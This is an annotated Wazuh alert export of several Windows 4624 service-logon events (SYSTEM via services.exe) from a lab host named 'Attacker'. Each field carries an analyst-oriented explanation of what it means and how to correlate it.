data.win.eventdata.subjectDomainName: WORKGROUP No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.subjectLogonId: 0x3e7 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetUserSid: S-1-5-18 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetUserName: SYSTEM No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetDomainName: NT AUTHORITY No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetLogonId: 0x3e7 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonType: 5 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonProcessName: Advapi No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.authenticationPackageName: Negotiate No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonGuid: {00000000-0000-0000-0000-000000000000} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.keyLength: 0 Length of the session key generated at logon (e.g., 128‑bit). 0 means no session key was requested, as with this local service logon; an unexpectedly short key on a network logon can point to a downgraded authentication protocol.
data.win.eventdata.processId: 0x304 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processName: C:\\Windows\\System32\\services.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.impersonationLevel: %%1833 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.virtualAccount: %%1843 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetLinkedLogonId: 0x0 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.elevatedToken: %%1842 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745533923.340987 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Security-Auditing No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.providerGuid: {54849625-5478-4994-a5ba-3e3b0328c30d} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventID: 4624 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 3 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.level: 0 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.task: 12544 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8020000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-20T01:46:37.0396840Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventRecordID: 43649 Incremental log record number – handy for timeline order.
data.win.system.processID: 792 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.threadID: 14292 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.channel: Security No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.severityValue: AUDIT_SUCCESS TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "An account was successfully logged on.
Subject:
Security ID: S-1-5-18
Account Name: ATTACKER$
Account Domain: WORKGROUP
Logon ID: 0x3E7
Logon Information:
Logon Type: 5
Restricted Admin Mode: -
Remote Credential Guard: -
Virtual Account: No
Elevated Token: Yes
Impersonation Level: Impersonation
New Logon:
Security ID: S-1-5-18
Account Name: SYSTEM
Account Domain: NT AUTHORITY
Logon ID: 0x3E7
Linked Logon ID: 0x0
Network Account Name: -
Network Account Domain: -
Logon GUID: {00000000-0000-0000-0000-000000000000}
Process Information:
Process ID: 0x304
Process Name: C:\Windows\System32\services.exe
Network Information:
Workstation Name: -
Source Network Address: -
Source Port: -
Detailed Authentication Information:
Logon Process: Advapi
Authentication Package: Negotiate
Transited Services: -
Package Name (NTLM only): -
Key Length: 0
This event is generated when a logon session is created. It is generated on the computer that was accessed.
The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.
The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).
The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.
The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.
The impersonation level field indicates the extent to which a process in the logon session can impersonate.
The authentication information fields provide detailed information about this specific logon request.
- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.
- Transited services indicate which intermediate services have participated in this logon request.
- Package name indicates which sub-protocol was used among the NTLM protocols.
- Key length indicates the length of the generated session key. This will be 0 if no session key was requested." Rendered message: the event's field values followed by Microsoft's standard explanatory text for this event ID. The same values are parsed into data.win.eventdata.* below; read the message, query the fields.
data.win.eventdata.subjectUserSid: S-1-5-18 SID of the account that requested the logon. S-1-5-18 is the well-known LocalSystem SID.
data.win.eventdata.subjectUserName: ATTACKER$ Name of the requesting account. The trailing $ marks the computer account, i.e. the host itself acting as SYSTEM.
data.win.eventdata.subjectDomainName: WORKGROUP Domain of the requesting account. WORKGROUP means the host is not domain-joined, so expect local accounts and NTLM rather than Kerberos.
data.win.eventdata.subjectLogonId: 0x3e7 Logon session of the requester. 0x3e7 (999) is the fixed LocalSystem session that exists from boot.
data.win.eventdata.targetUserSid: S-1-5-18 SID of the account that was logged on. Here it equals the subject SID: SYSTEM logging on as SYSTEM.
data.win.eventdata.targetUserName: SYSTEM Name of the account that was logged on. The main pivot for "who logged on".
data.win.eventdata.targetDomainName: NT AUTHORITY Domain of the logged-on account. NT AUTHORITY\SYSTEM is the built-in LocalSystem account.
data.win.eventdata.targetLogonId: 0x3e7 ID of the new logon session. Join it with 4634/4647 (logoff), 4672 (special privileges) and 4688 (process creation) to follow what the session did.
data.win.eventdata.logonType: 5 Logon type. 5 = Service: the Service Control Manager started a service under this account. Routine on its own; correlate with new service installs (4697 in Security, 7045 in System) before calling it benign. Other common values: 2 interactive, 3 network, 10 RDP.
data.win.eventdata.logonProcessName: Advapi Trusted logon process that requested the logon. Advapi is the LogonUser API path the SCM uses for service logons; interactive logons show User32, network logons NtLmSsp or Kerberos.
data.win.eventdata.authenticationPackageName: Negotiate Authentication package. Negotiate selects Kerberos when a KDC is reachable and otherwise NTLM, which on a WORKGROUP host is the only option.
data.win.eventdata.logonGuid: {00000000-0000-0000-0000-000000000000} GUID for correlating with a KDC event (4768/4769). All zeros means no Kerberos ticket was involved, so there is nothing to join on a domain controller.
data.win.eventdata.keyLength: 0 Length of the session key negotiated for the logon. 0 is normal here: the event text itself says it is 0 when no session key was requested, as for a local service logon. Only on network NTLM logons does a short key (e.g. 56 or 40 bits) hint at a downgrade.
data.win.eventdata.processId: 0x304 PID (hex; 0x304 = 772) of the process that called the logon API, the same process as processName.
data.win.eventdata.processName: C:\\Windows\\System32\\services.exe Process that performed the logon. services.exe is the Service Control Manager, which is what type 5 should show; any other path with type 5 deserves a look.
data.win.eventdata.impersonationLevel: %%1833 Windows resource-string code; the rendered message shows it as Impersonation. It sets how far a process in this session can impersonate the account.
data.win.eventdata.virtualAccount: %%1843 Resource-string code that renders as No: the session is not a virtual account (a Windows-managed service identity such as NT SERVICE\name).
data.win.eventdata.targetLinkedLogonId: 0x0 Logon ID of the linked (UAC split-token) session. 0x0 means there is none, as expected for a service logon.
data.win.eventdata.elevatedToken: %%1842 Resource-string code that renders as Yes: the new session holds a full administrative token. Expected for SYSTEM; noteworthy for ordinary users.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745533923.348325 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Security-Auditing ETW provider that wrote the record. Security-Auditing means a Security-log audit event, not an application, System-log or Sysmon event.
data.win.system.providerGuid: {54849625-5478-4994-a5ba-3e3b0328c30d} Provider GUID. This value is the fixed GUID of Microsoft-Windows-Security-Auditing; filter on it when provider names are localized or missing.
data.win.system.eventID: 4624 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones! 4624 = an account was successfully logged on; read it together with logonType and processName below.
data.win.system.version: 3 Schema version of the event template. Later 4624 versions add fields such as Restricted Admin Mode, Virtual Account, Elevated Token and Remote Credential Guard, so parsers must tolerate fields missing on older hosts.
data.win.system.level: 0 Numeric level. 0 is LogAlways, which every Security-Auditing record carries; success versus failure comes from keywords/severityValue, not from level.
data.win.system.task: 12544 Windows task category (Logon, Policy Change, etc.). 12544 is the Logon category.
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8020000000000000 Bit‑flag keywords set by Windows. 0x8020000000000000 is Audit Success and 0x8010000000000000 is Audit Failure, so this is the field to split successes from failures in queries.
data.win.system.systemTime: 2025-04-20T01:46:37.1845071Z Time the record was written on the endpoint, in UTC (trailing Z). Compare it with the Wazuh alert id, whose prefix is the manager's Unix timestamp: the records here are dated 2025-04-20 but the alert ids on this page resolve to 2025-04-24, so they were read from backlog (e.g. a newly enrolled agent) or the endpoint clock is off. Settle that before building a timeline.
data.win.system.eventRecordID: 43651 Incremental log record number – handy for timeline order.
data.win.system.processID: 792 PID of the process that logged the record (typically lsass.exe, which hosts the auditing subsystem), not the process that performed the logon; that one is data.win.eventdata.processId.
data.win.system.threadID: 14292 Thread inside that logging process. Only needed in deep forensics.
data.win.system.channel: Security Event log channel holding the record. The Security log is populated only for subcategories the audit policy enables and is readable by default only by Administrators and Event Log Readers.
data.win.system.computer: Attacker Computer name recorded in the event itself. It should match agent.name; a mismatch is worth explaining.
data.win.system.severityValue: AUDIT_SUCCESS Wazuh severity text. For the Security channel this is AUDIT_SUCCESS or AUDIT_FAILURE rather than INFO/WARNING/ERROR; a successful logon still deserves reading.
data.win.system.message: "An account was successfully logged on.
Subject:
Security ID: S-1-5-18
Account Name: ATTACKER$
Account Domain: WORKGROUP
Logon ID: 0x3E7
Logon Information:
Logon Type: 5
Restricted Admin Mode: -
Remote Credential Guard: -
Virtual Account: No
Elevated Token: Yes
Impersonation Level: Impersonation
New Logon:
Security ID: S-1-5-18
Account Name: SYSTEM
Account Domain: NT AUTHORITY
Logon ID: 0x3E7
Linked Logon ID: 0x0
Network Account Name: -
Network Account Domain: -
Logon GUID: {00000000-0000-0000-0000-000000000000}
Process Information:
Process ID: 0x304
Process Name: C:\Windows\System32\services.exe
Network Information:
Workstation Name: -
Source Network Address: -
Source Port: -
Detailed Authentication Information:
Logon Process: Advapi
Authentication Package: Negotiate
Transited Services: -
Package Name (NTLM only): -
Key Length: 0
This event is generated when a logon session is created. It is generated on the computer that was accessed.
The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.
The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).
The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.
The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.
The impersonation level field indicates the extent to which a process in the logon session can impersonate.
The authentication information fields provide detailed information about this specific logon request.
- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.
- Transited services indicate which intermediate services have participated in this logon request.
- Package name indicates which sub-protocol was used among the NTLM protocols.
- Key length indicates the length of the generated session key. This will be 0 if no session key was requested." Rendered message: the event's field values followed by Microsoft's standard explanatory text for this event ID. The same values are parsed into data.win.eventdata.* below; read the message, query the fields.
data.win.eventdata.subjectUserSid: S-1-5-18 SID of the account that requested the logon. S-1-5-18 is the well-known LocalSystem SID.
data.win.eventdata.subjectUserName: ATTACKER$ Name of the requesting account. The trailing $ marks the computer account, i.e. the host itself acting as SYSTEM.
data.win.eventdata.subjectDomainName: WORKGROUP Domain of the requesting account. WORKGROUP means the host is not domain-joined, so expect local accounts and NTLM rather than Kerberos.
data.win.eventdata.subjectLogonId: 0x3e7 Logon session of the requester. 0x3e7 (999) is the fixed LocalSystem session that exists from boot.
data.win.eventdata.targetUserSid: S-1-5-18 SID of the account that was logged on. Here it equals the subject SID: SYSTEM logging on as SYSTEM.
data.win.eventdata.targetUserName: SYSTEM Name of the account that was logged on. The main pivot for "who logged on".
data.win.eventdata.targetDomainName: NT AUTHORITY Domain of the logged-on account. NT AUTHORITY\SYSTEM is the built-in LocalSystem account.
data.win.eventdata.targetLogonId: 0x3e7 ID of the new logon session. Join it with 4634/4647 (logoff), 4672 (special privileges) and 4688 (process creation) to follow what the session did.
data.win.eventdata.logonType: 5 Logon type. 5 = Service: the Service Control Manager started a service under this account. Routine on its own; correlate with new service installs (4697 in Security, 7045 in System) before calling it benign. Other common values: 2 interactive, 3 network, 10 RDP.
data.win.eventdata.logonProcessName: Advapi Trusted logon process that requested the logon. Advapi is the LogonUser API path the SCM uses for service logons; interactive logons show User32, network logons NtLmSsp or Kerberos.
data.win.eventdata.authenticationPackageName: Negotiate Authentication package. Negotiate selects Kerberos when a KDC is reachable and otherwise NTLM, which on a WORKGROUP host is the only option.
data.win.eventdata.logonGuid: {00000000-0000-0000-0000-000000000000} GUID for correlating with a KDC event (4768/4769). All zeros means no Kerberos ticket was involved, so there is nothing to join on a domain controller.
data.win.eventdata.keyLength: 0 Length of the session key negotiated for the logon. 0 is normal here: the event text itself says it is 0 when no session key was requested, as for a local service logon. Only on network NTLM logons does a short key (e.g. 56 or 40 bits) hint at a downgrade.
data.win.eventdata.processId: 0x304 PID (hex; 0x304 = 772) of the process that called the logon API, the same process as processName.
data.win.eventdata.processName: C:\\Windows\\System32\\services.exe Process that performed the logon. services.exe is the Service Control Manager, which is what type 5 should show; any other path with type 5 deserves a look.
data.win.eventdata.impersonationLevel: %%1833 Windows resource-string code; the rendered message shows it as Impersonation. It sets how far a process in this session can impersonate the account.
data.win.eventdata.virtualAccount: %%1843 Resource-string code that renders as No: the session is not a virtual account (a Windows-managed service identity such as NT SERVICE\name).
data.win.eventdata.targetLinkedLogonId: 0x0 Logon ID of the linked (UAC split-token) session. 0x0 means there is none, as expected for a service logon.
data.win.eventdata.elevatedToken: %%1842 Resource-string code that renders as Yes: the new session holds a full administrative token. Expected for SYSTEM; noteworthy for ordinary users.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745533925.355663 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Security-Auditing ETW provider that wrote the record. Security-Auditing means a Security-log audit event, not an application, System-log or Sysmon event.
data.win.system.providerGuid: {54849625-5478-4994-a5ba-3e3b0328c30d} Provider GUID. This value is the fixed GUID of Microsoft-Windows-Security-Auditing; filter on it when provider names are localized or missing.
data.win.system.eventID: 4624 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones! 4624 = an account was successfully logged on; read it together with logonType and processName below.
data.win.system.version: 3 Schema version of the event template. Later 4624 versions add fields such as Restricted Admin Mode, Virtual Account, Elevated Token and Remote Credential Guard, so parsers must tolerate fields missing on older hosts.
data.win.system.level: 0 Numeric level. 0 is LogAlways, which every Security-Auditing record carries; success versus failure comes from keywords/severityValue, not from level.
data.win.system.task: 12544 Windows task category (Logon, Policy Change, etc.). 12544 is the Logon category.
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8020000000000000 Bit‑flag keywords set by Windows. 0x8020000000000000 is Audit Success and 0x8010000000000000 is Audit Failure, so this is the field to split successes from failures in queries.
data.win.system.systemTime: 2025-04-20T01:46:40.7220277Z Time the record was written on the endpoint, in UTC (trailing Z). Compare it with the Wazuh alert id, whose prefix is the manager's Unix timestamp: the records here are dated 2025-04-20 but the alert ids on this page resolve to 2025-04-24, so they were read from backlog (e.g. a newly enrolled agent) or the endpoint clock is off. Settle that before building a timeline.
data.win.system.eventRecordID: 43675 Incremental log record number – handy for timeline order.
data.win.system.processID: 792 PID of the process that logged the record (typically lsass.exe, which hosts the auditing subsystem), not the process that performed the logon; that one is data.win.eventdata.processId.
data.win.system.threadID: 9160 Thread inside that logging process. Only needed in deep forensics.
data.win.system.channel: Security Event log channel holding the record. The Security log is populated only for subcategories the audit policy enables and is readable by default only by Administrators and Event Log Readers.
data.win.system.computer: Attacker Computer name recorded in the event itself. It should match agent.name; a mismatch is worth explaining.
data.win.system.severityValue: AUDIT_SUCCESS Wazuh severity text. For the Security channel this is AUDIT_SUCCESS or AUDIT_FAILURE rather than INFO/WARNING/ERROR; a successful logon still deserves reading.
data.win.system.message: "An account was successfully logged on.
Subject:
Security ID: S-1-5-18
Account Name: ATTACKER$
Account Domain: WORKGROUP
Logon ID: 0x3E7
Logon Information:
Logon Type: 5
Restricted Admin Mode: -
Remote Credential Guard: -
Virtual Account: No
Elevated Token: Yes
Impersonation Level: Impersonation
New Logon:
Security ID: S-1-5-18
Account Name: SYSTEM
Account Domain: NT AUTHORITY
Logon ID: 0x3E7
Linked Logon ID: 0x0
Network Account Name: -
Network Account Domain: -
Logon GUID: {00000000-0000-0000-0000-000000000000}
Process Information:
Process ID: 0x304
Process Name: C:\Windows\System32\services.exe
Network Information:
Workstation Name: -
Source Network Address: -
Source Port: -
Detailed Authentication Information:
Logon Process: Advapi
Authentication Package: Negotiate
Transited Services: -
Package Name (NTLM only): -
Key Length: 0
This event is generated when a logon session is created. It is generated on the computer that was accessed.
The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.
The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).
The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.
The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.
The impersonation level field indicates the extent to which a process in the logon session can impersonate.
The authentication information fields provide detailed information about this specific logon request.
- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.
- Transited services indicate which intermediate services have participated in this logon request.
- Package name indicates which sub-protocol was used among the NTLM protocols.
- Key length indicates the length of the generated session key. This will be 0 if no session key was requested." Rendered message: the event's field values followed by Microsoft's standard explanatory text for this event ID. The same values are parsed into data.win.eventdata.* below; read the message, query the fields.
data.win.eventdata.subjectUserSid: S-1-5-18 SID of the account that requested the logon. S-1-5-18 is the well-known LocalSystem SID.
data.win.eventdata.subjectUserName: ATTACKER$ Name of the requesting account. The trailing $ marks the computer account, i.e. the host itself acting as SYSTEM.
data.win.eventdata.subjectDomainName: WORKGROUP Domain of the requesting account. WORKGROUP means the host is not domain-joined, so expect local accounts and NTLM rather than Kerberos.
data.win.eventdata.subjectLogonId: 0x3e7 Logon session of the requester. 0x3e7 (999) is the fixed LocalSystem session that exists from boot.
data.win.eventdata.targetUserSid: S-1-5-18 SID of the account that was logged on. Here it equals the subject SID: SYSTEM logging on as SYSTEM.
data.win.eventdata.targetUserName: SYSTEM Name of the account that was logged on. The main pivot for "who logged on".
data.win.eventdata.targetDomainName: NT AUTHORITY Domain of the logged-on account. NT AUTHORITY\SYSTEM is the built-in LocalSystem account.
data.win.eventdata.targetLogonId: 0x3e7 ID of the new logon session. Join it with 4634/4647 (logoff), 4672 (special privileges) and 4688 (process creation) to follow what the session did.
data.win.eventdata.logonType: 5 Logon type. 5 = Service: the Service Control Manager started a service under this account. Routine on its own; correlate with new service installs (4697 in Security, 7045 in System) before calling it benign. Other common values: 2 interactive, 3 network, 10 RDP.
data.win.eventdata.logonProcessName: Advapi Trusted logon process that requested the logon. Advapi is the LogonUser API path the SCM uses for service logons; interactive logons show User32, network logons NtLmSsp or Kerberos.
data.win.eventdata.authenticationPackageName: Negotiate Authentication package. Negotiate selects Kerberos when a KDC is reachable and otherwise NTLM, which on a WORKGROUP host is the only option.
data.win.eventdata.logonGuid: {00000000-0000-0000-0000-000000000000} GUID for correlating with a KDC event (4768/4769). All zeros means no Kerberos ticket was involved, so there is nothing to join on a domain controller.
data.win.eventdata.keyLength: 0 Length of the session key negotiated for the logon. 0 is normal here: the event text itself says it is 0 when no session key was requested, as for a local service logon. Only on network NTLM logons does a short key (e.g. 56 or 40 bits) hint at a downgrade.
data.win.eventdata.processId: 0x304 PID (hex; 0x304 = 772) of the process that called the logon API, the same process as processName.
data.win.eventdata.processName: C:\\Windows\\System32\\services.exe Process that performed the logon. services.exe is the Service Control Manager, which is what type 5 should show; any other path with type 5 deserves a look.
data.win.eventdata.impersonationLevel: %%1833 Windows resource-string code; the rendered message shows it as Impersonation. It sets how far a process in this session can impersonate the account.
data.win.eventdata.virtualAccount: %%1843 Resource-string code that renders as No: the session is not a virtual account (a Windows-managed service identity such as NT SERVICE\name).
data.win.eventdata.targetLinkedLogonId: 0x0 Logon ID of the linked (UAC split-token) session. 0x0 means there is none, as expected for a service logon.
data.win.eventdata.elevatedToken: %%1842 Resource-string code that renders as Yes: the new session holds a full administrative token. Expected for SYSTEM; noteworthy for ordinary users.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745533925.362999 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Security-Auditing ETW provider that wrote the record. Security-Auditing means a Security-log audit event, not an application, System-log or Sysmon event.
data.win.system.providerGuid: {54849625-5478-4994-a5ba-3e3b0328c30d} Provider GUID. This value is the fixed GUID of Microsoft-Windows-Security-Auditing; filter on it when provider names are localized or missing.
data.win.system.eventID: 4624 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones! 4624 = an account was successfully logged on; read it together with logonType and processName below.
data.win.system.version: 3 Schema version of the event template. Later 4624 versions add fields such as Restricted Admin Mode, Virtual Account, Elevated Token and Remote Credential Guard, so parsers must tolerate fields missing on older hosts.
data.win.system.level: 0 Numeric level. 0 is LogAlways, which every Security-Auditing record carries; success versus failure comes from keywords/severityValue, not from level.
data.win.system.task: 12544 Windows task category (Logon, Policy Change, etc.). 12544 is the Logon category.
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8020000000000000 Bit‑flag keywords set by Windows. 0x8020000000000000 is Audit Success and 0x8010000000000000 is Audit Failure, so this is the field to split successes from failures in queries.
data.win.system.systemTime: 2025-04-20T01:46:40.8641766Z Time the record was written on the endpoint, in UTC (trailing Z). Compare it with the Wazuh alert id, whose prefix is the manager's Unix timestamp: the records here are dated 2025-04-20 but the alert ids on this page resolve to 2025-04-24, so they were read from backlog (e.g. a newly enrolled agent) or the endpoint clock is off. Settle that before building a timeline.
data.win.system.eventRecordID: 43677 Incremental log record number – handy for timeline order.
data.win.system.processID: 792 PID of the process that logged the record (typically lsass.exe, which hosts the auditing subsystem), not the process that performed the logon; that one is data.win.eventdata.processId.
data.win.system.threadID: 14292 Thread inside that logging process. Only needed in deep forensics.
data.win.system.channel: Security Event log channel holding the record. The Security log is populated only for subcategories the audit policy enables and is readable by default only by Administrators and Event Log Readers.
data.win.system.computer: Attacker Computer name recorded in the event itself. It should match agent.name; a mismatch is worth explaining.
data.win.system.severityValue: AUDIT_SUCCESS Wazuh severity text. For the Security channel this is AUDIT_SUCCESS or AUDIT_FAILURE rather than INFO/WARNING/ERROR; a successful logon still deserves reading.
data.win.system.message: "An account was successfully logged on.
Subject:
Security ID: S-1-5-18
Account Name: ATTACKER$
Account Domain: WORKGROUP
Logon ID: 0x3E7
Logon Information:
Logon Type: 5
Restricted Admin Mode: -
Remote Credential Guard: -
Virtual Account: No
Elevated Token: Yes
Impersonation Level: Impersonation
New Logon:
Security ID: S-1-5-18
Account Name: SYSTEM
Account Domain: NT AUTHORITY
Logon ID: 0x3E7
Linked Logon ID: 0x0
Network Account Name: -
Network Account Domain: -
Logon GUID: {00000000-0000-0000-0000-000000000000}
Process Information:
Process ID: 0x304
Process Name: C:\Windows\System32\services.exe
Network Information:
Workstation Name: -
Source Network Address: -
Source Port: -
Detailed Authentication Information:
Logon Process: Advapi
Authentication Package: Negotiate
Transited Services: -
Package Name (NTLM only): -
Key Length: 0
This event is generated when a logon session is created. It is generated on the computer that was accessed.
The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.
The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).
The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.
The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.
The impersonation level field indicates the extent to which a process in the logon session can impersonate.
The authentication information fields provide detailed information about this specific logon request.
- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.
- Transited services indicate which intermediate services have participated in this logon request.
- Package name indicates which sub-protocol was used among the NTLM protocols.
- Key length indicates the length of the generated session key. This will be 0 if no session key was requested." Rendered message: the event's field values followed by Microsoft's standard explanatory text for this event ID. The same values are parsed into data.win.eventdata.* below; read the message, query the fields.
data.win.eventdata.subjectUserSid: S-1-5-18 SID of the account that requested the logon. S-1-5-18 is the well-known LocalSystem SID.
data.win.eventdata.subjectUserName: ATTACKER$ Name of the requesting account. The trailing $ marks the computer account, i.e. the host itself acting as SYSTEM.
data.win.eventdata.subjectDomainName: WORKGROUP Domain of the requesting account. WORKGROUP means the host is not domain-joined, so expect local accounts and NTLM rather than Kerberos.
data.win.eventdata.subjectLogonId: 0x3e7 Logon session of the requester. 0x3e7 (999) is the fixed LocalSystem session that exists from boot.
data.win.eventdata.targetUserSid: S-1-5-18 SID of the account that was logged on. Here it equals the subject SID: SYSTEM logging on as SYSTEM.
data.win.eventdata.targetUserName: SYSTEM Name of the account that was logged on. The main pivot for "who logged on".
data.win.eventdata.targetDomainName: NT AUTHORITY Domain of the logged-on account. NT AUTHORITY\SYSTEM is the built-in LocalSystem account.
data.win.eventdata.targetLogonId: 0x3e7 ID of the new logon session. Join it with 4634/4647 (logoff), 4672 (special privileges) and 4688 (process creation) to follow what the session did.
data.win.eventdata.logonType: 5 Logon type. 5 = Service: the Service Control Manager started a service under this account. Routine on its own; correlate with new service installs (4697 in Security, 7045 in System) before calling it benign. Other common values: 2 interactive, 3 network, 10 RDP.
data.win.eventdata.logonProcessName: Advapi Trusted logon process that requested the logon. Advapi is the LogonUser API path the SCM uses for service logons; interactive logons show User32, network logons NtLmSsp or Kerberos.
data.win.eventdata.authenticationPackageName: Negotiate Authentication package. Negotiate selects Kerberos when a KDC is reachable and otherwise NTLM, which on a WORKGROUP host is the only option.
data.win.eventdata.logonGuid: {00000000-0000-0000-0000-000000000000} GUID for correlating with a KDC event (4768/4769). All zeros means no Kerberos ticket was involved, so there is nothing to join on a domain controller.
data.win.eventdata.keyLength: 0 Length of the session key negotiated for the logon. 0 is normal here: the event text itself says it is 0 when no session key was requested, as for a local service logon. Only on network NTLM logons does a short key (e.g. 56 or 40 bits) hint at a downgrade.
data.win.eventdata.processId: 0x304 PID (hex; 0x304 = 772) of the process that called the logon API, the same process as processName.
data.win.eventdata.processName: C:\\Windows\\System32\\services.exe Process that performed the logon. services.exe is the Service Control Manager, which is what type 5 should show; any other path with type 5 deserves a look.
data.win.eventdata.impersonationLevel: %%1833 Windows resource-string code; the rendered message shows it as Impersonation. It sets how far a process in this session can impersonate the account.
data.win.eventdata.virtualAccount: %%1843 Resource-string code that renders as No: the session is not a virtual account (a Windows-managed service identity such as NT SERVICE\name).
data.win.eventdata.targetLinkedLogonId: 0x0 Logon ID of the linked (UAC split-token) session. 0x0 means there is none, as expected for a service logon.
data.win.eventdata.elevatedToken: %%1842 Resource-string code that renders as Yes: the new session holds a full administrative token. Expected for SYSTEM; noteworthy for ordinary users.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
